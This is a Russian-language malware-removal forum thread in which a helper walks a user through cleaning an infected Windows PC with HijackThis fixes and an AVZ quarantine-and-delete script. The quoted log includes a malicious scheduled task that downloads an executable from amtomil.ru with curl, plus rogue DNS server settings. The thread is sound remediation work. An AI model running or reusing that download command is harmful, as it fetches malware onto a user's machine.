Машина зверски тормозит после удаления вирусов

[440]

Опять нацеплял дряни. Все что мог, удалил антивирусом.
Остальное перелопатил вручную.
Машина на i7 тормозит как 1-й пентиум.

[Info_bot]

Уважаемый(ая) 440, спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

[Vvvyg]

Запустите HijackThis, расположенный в папке Autologger и пофиксите (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):

Код:

O17 - HKLM\System\CSS\Services\Tcpip\..\{11F8A404-72E7-4E66-9A7C-55D90F1AB305}: NameServer = 104.197.191.4
O17 - HKLM\System\CSS\Services\Tcpip\..\{17397C8A-56E6-4309-A7A7-F136385D9613}: NameServer = 104.197.191.4
O17 - HKLM\System\CSS\Services\Tcpip\..\{2C7B2EE4-D141-4A1C-97DA-E7C9EC9B9B3F}: NameServer = 190.202.81.115
O17 - HKLM\System\CSS\Services\Tcpip\..\{2C7B2EE4-D141-4A1C-97DA-E7C9EC9B9B3F}: NameServer = 192.95.48.17
O17 - HKLM\System\CSS\Services\Tcpip\..\{5BE2EC8F-309E-4B5A-9BE7-74DFB1B739A1}: NameServer = 192.168.1.1
O17 - HKLM\System\CSS\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 156.154.126.70
O17 - HKLM\System\CSS\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 158.69.57.22
O17 - HKLM\System\CSS\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 186.167.16.187
O17 - HKLM\System\CSS\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 200.8.65.30
O17 - HKLM\System\CSS\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 208.67.222.220
O17 - HKLM\System\CSS\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 75.75.76.76
O17 - HKLM\System\CSS\Services\Tcpip\..\{708573E3-B871-4F8A-9447-EC9F706F7DCE}: NameServer = 104.197.191.4
O17 - HKLM\System\CSS\Services\Tcpip\..\{74CE9FE5-FCB4-4CA7-A2E2-F4826A481FC4}: NameServer = 104.197.191.4
O17 - HKLM\System\CSS\Services\Tcpip\..\{9430F82A-33AD-4805-A245-036425D9039E}: NameServer = 104.197.191.4
O17 - HKLM\System\CSS\Services\Tcpip\..\{99609B11-2461-4FD2-A038-99485FE71D1F}: NameServer = 82.163.142.7
O17 - HKLM\System\CSS\Services\Tcpip\..\{99609B11-2461-4FD2-A038-99485FE71D1F}: NameServer = 95.211.158.134
O17 - HKLM\System\CSS\Services\Tcpip\..\{9ED4BEA7-7355-4294-8900-ACC345D7445A}: NameServer = 82.163.142.7
O17 - HKLM\System\CSS\Services\Tcpip\..\{9ED4BEA7-7355-4294-8900-ACC345D7445A}: NameServer = 95.211.158.134
O17 - HKLM\System\CSS\Services\Tcpip\..\{A79741A2-9617-4393-8AB5-9735DE286CBA}: NameServer = 207.188.83.232
O17 - HKLM\System\CSS\Services\Tcpip\..\{AB6ED26C-C490-4785-8610-2BDE3F579DDC}: NameServer = 199.85.126.10
O17 - HKLM\System\CSS\Services\Tcpip\..\{AB6ED26C-C490-4785-8610-2BDE3F579DDC}: NameServer = 199.85.127.10
O17 - HKLM\System\CSS\Services\Tcpip\..\{E07146A0-CE89-4A25-8A05-0B2B065E66AA}: NameServer = 104.197.191.4
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{11F8A404-72E7-4E66-9A7C-55D90F1AB305}: NameServer = 104.197.191.4
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{17397C8A-56E6-4309-A7A7-F136385D9613}: NameServer = 104.197.191.4
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{2C7B2EE4-D141-4A1C-97DA-E7C9EC9B9B3F}: NameServer = 190.202.81.115
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{2C7B2EE4-D141-4A1C-97DA-E7C9EC9B9B3F}: NameServer = 192.95.48.17
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{5BE2EC8F-309E-4B5A-9BE7-74DFB1B739A1}: NameServer = 192.168.1.1
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 156.154.126.70
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 158.69.57.22
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 186.167.16.187
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 200.8.65.30
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 208.67.222.220
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 75.75.76.76
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{708573E3-B871-4F8A-9447-EC9F706F7DCE}: NameServer = 104.197.191.4
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{74CE9FE5-FCB4-4CA7-A2E2-F4826A481FC4}: NameServer = 104.197.191.4
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9430F82A-33AD-4805-A245-036425D9039E}: NameServer = 104.197.191.4
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{99609B11-2461-4FD2-A038-99485FE71D1F}: NameServer = 82.163.142.7
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{99609B11-2461-4FD2-A038-99485FE71D1F}: NameServer = 95.211.158.134
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9ED4BEA7-7355-4294-8900-ACC345D7445A}: NameServer = 82.163.142.7
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9ED4BEA7-7355-4294-8900-ACC345D7445A}: NameServer = 95.211.158.134
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{A79741A2-9617-4393-8AB5-9735DE286CBA}: NameServer = 207.188.83.232
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{AB6ED26C-C490-4785-8610-2BDE3F579DDC}: NameServer = 199.85.126.10
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{AB6ED26C-C490-4785-8610-2BDE3F579DDC}: NameServer = 199.85.127.10
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{E07146A0-CE89-4A25-8A05-0B2B065E66AA}: NameServer = 104.197.191.4
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{11F8A404-72E7-4E66-9A7C-55D90F1AB305}: NameServer = 104.197.191.4
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{17397C8A-56E6-4309-A7A7-F136385D9613}: NameServer = 104.197.191.4
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{2C7B2EE4-D141-4A1C-97DA-E7C9EC9B9B3F}: NameServer = 190.202.81.115
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{2C7B2EE4-D141-4A1C-97DA-E7C9EC9B9B3F}: NameServer = 192.95.48.17
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{5BE2EC8F-309E-4B5A-9BE7-74DFB1B739A1}: NameServer = 192.168.1.1
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 156.154.126.70
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 158.69.57.22
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 186.167.16.187
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 200.8.65.30
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 208.67.222.220
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{6C7ED0F7-0427-455A-A90C-2169CA0FADD5}: NameServer = 75.75.76.76
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{708573E3-B871-4F8A-9447-EC9F706F7DCE}: NameServer = 104.197.191.4
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{74CE9FE5-FCB4-4CA7-A2E2-F4826A481FC4}: NameServer = 104.197.191.4
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9430F82A-33AD-4805-A245-036425D9039E}: NameServer = 104.197.191.4
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{99609B11-2461-4FD2-A038-99485FE71D1F}: NameServer = 82.163.142.7
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{99609B11-2461-4FD2-A038-99485FE71D1F}: NameServer = 95.211.158.134
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9ED4BEA7-7355-4294-8900-ACC345D7445A}: NameServer = 82.163.142.7
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{9ED4BEA7-7355-4294-8900-ACC345D7445A}: NameServer = 95.211.158.134
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{A79741A2-9617-4393-8AB5-9735DE286CBA}: NameServer = 207.188.83.232
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{AB6ED26C-C490-4785-8610-2BDE3F579DDC}: NameServer = 199.85.126.10
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{AB6ED26C-C490-4785-8610-2BDE3F579DDC}: NameServer = 199.85.127.10
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{E07146A0-CE89-4A25-8A05-0B2B065E66AA}: NameServer = 104.197.191.4
O21 - ShellIconOverlayIdentifiers:  MEGA (Pending) - {056D528D-CE28-4194-9BA3-BA2E9197FF8C} - C:\Users\TOP\AppData\Local\MEGAsync\ShellExtX64.dll (file missing)
O21 - ShellIconOverlayIdentifiers:  MEGA (Synced) - {05B38830-F4E9-4329-978B-1DD28605D202} - C:\Users\TOP\AppData\Local\MEGAsync\ShellExtX64.dll (file missing)
O21 - ShellIconOverlayIdentifiers:  MEGA (Syncing) - {0596C850-7BDD-4C9D-AFDF-873BE6890637} - C:\Users\TOP\AppData\Local\MEGAsync\ShellExtX64.dll (file missing)
O21 - ShellIconOverlayIdentifiers: 00asw - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O21-32 - ShellIconOverlayIdentifiers:  MEGA (Pending) - {056D528D-CE28-4194-9BA3-BA2E9197FF8C} - C:\Users\TOP\AppData\Local\MEGAsync\ShellExtX32.dll (file missing)
O21-32 - ShellIconOverlayIdentifiers:  MEGA (Synced) - {05B38830-F4E9-4329-978B-1DD28605D202} - C:\Users\TOP\AppData\Local\MEGAsync\ShellExtX32.dll (file missing)
O21-32 - ShellIconOverlayIdentifiers:  MEGA (Syncing) - {0596C850-7BDD-4C9D-AFDF-873BE6890637} - C:\Users\TOP\AppData\Local\MEGAsync\ShellExtX32.dll (file missing)
O22 - Task (Queued): NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} - C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe (file missing)
O22 - Task (Queued): curls - C:\Users\TOP\AppData\Roaming\curl\curl.exe (file missing)
O22 - Task (Ready): GoogleUpdateTaskMachineCore - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c (file missing)
O22 - Task (Ready): GoogleUpdateTaskMachineUA - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler (file missing)
O22 - Task (Ready): MSI - C:\Users\TOP\AppData\Roaming\Microsoft\msi.exe cnt=2 fts="scoped_dir1196_15431\vimehackwin_-_chit_na_vimeworld_c99-a6c___.exe" (file missing)
O22 - Task (Ready): OrbitumUpdateTaskUserS-1-5-21-1771641454-1423502667-3866363202-1000Core - C:\Users\TOP\AppData\Local\Orbitum\Update\GoogleUpdate.exe /c (file missing)
O22 - Task (Ready): OrbitumUpdateTaskUserS-1-5-21-1771641454-1423502667-3866363202-1000UA - C:\Users\TOP\AppData\Local\Orbitum\Update\GoogleUpdate.exe /ua /installsource scheduler (file missing)
O22 - Task (Ready): curl - C:\Users\TOP\AppData\Roaming\curl\curl_7_54.exe -f -L http://amtomil.ru/f.exe -o C:\Users\TOP\AppData\Roaming\curl\curl.exe

Выполните скрипт в AVZ:

Код:

begin
 QuarantineFile('C:\Users\TOP\AppData\Roaming\curl\curl.exe', '');
 QuarantineFile('C:\Users\TOP\AppData\Roaming\curl\curl_7_54.exe', '');
 QuarantineFile('C:\Users\TOP\AppData\Roaming\Microsoft\msi.exe', '');
 QuarantineFile('C:\Users\TOP\AppData\Roaming\System\svchost.exe', '');
 QuarantineFile('C:\Windows\System32\ihctrl32.dll', '');
 QuarantineFile('C:\Windows\System32\themctrl.dll', '');
 QuarantineFile('C:\Windows\System32\wbiosrvp.dll', '');
 QuarantineFile('C:\Windows\System32\wsaudio.dll', '');
 DeleteFile('C:\Users\TOP\AppData\Roaming\curl\curl.exe', '32');
 DeleteFile('C:\Users\TOP\AppData\Roaming\curl\curl_7_54.exe', '32');
 DeleteFile('C:\Users\TOP\AppData\Roaming\Microsoft\msi.exe', '32');
 DeleteFile('C:\Users\TOP\AppData\Roaming\System\svchost.exe', '32');
 DeleteFile('C:\Windows\system32\DRIVERS\BAPIDRV64.sys', '32');
 DeleteFile('C:\Windows\System32\ihctrl32.dll', '32');
 DeleteFile('C:\Windows\System32\themctrl.dll', '32');
 DeleteFile('C:\Windows\System32\wbiosrvp.dll', '32');
 DeleteFile('C:\Windows\System32\wsaudio.dll', '32');
 DeleteFile('http:\amtomil.ru\f.exe', '32');
 ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true);
 DeleteService('BAPIDRV');
 DeleteService('clr_optimization_v1.03');
 DeleteFileMask('c:\users\top\appdata\roaming\curl', '*', true);
 DeleteDirectory('c:\users\top\appdata\roaming\curl');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Services\ihctrl32\Parameters', 'ServiceDll');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Services\themctrl\Parameters', 'ServiceDll');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Services\wbiosrvp\Parameters', 'ServiceDll');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Services\wsaudio\Parameters', 'ServiceDll');
ExecuteRepair(21);
ExecuteFile('ipconfig.exe', '/flushdns', 0, 15000, true);
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 2, true);
RebootWindows(true);
end.

Компьютер перезагрузится.

В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

Сделайте новый лог Autologger.

Сделайте лог Malwarebytes AdwCleaner.

[440]

Спасибо Вам, дружище. Что бы я без Вас делал....
Машина заработала ощутимо шустрее.
Перестало выскакивать окошко антивируса с сообщением "доступ к сайту efrodom.ru заблокирован".
К сожалению, запрошенный карантин я случайно затёр.... - удалил папку автологгера, совсем забывши, что там карантин.
Извините, ради Бога. Я понимаю, что это был бы мой вклад в базу знаний сайта...

[Vvvyg]

Лог AdwCleaner нужен был До очистки, а не после.

Запустите HijackThis, расположенный в папке Autologger и пофиксите (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):

Код:

O22 - Task (Ready): MSI - C:\Users\TOP\AppData\Roaming\Microsoft\msi.exe cnt=2 fts="scoped_dir1196_15431\vimehackwin_-_chit_na_vimeworld_c99-a6c___.exe" (file missing)

И всё на этом.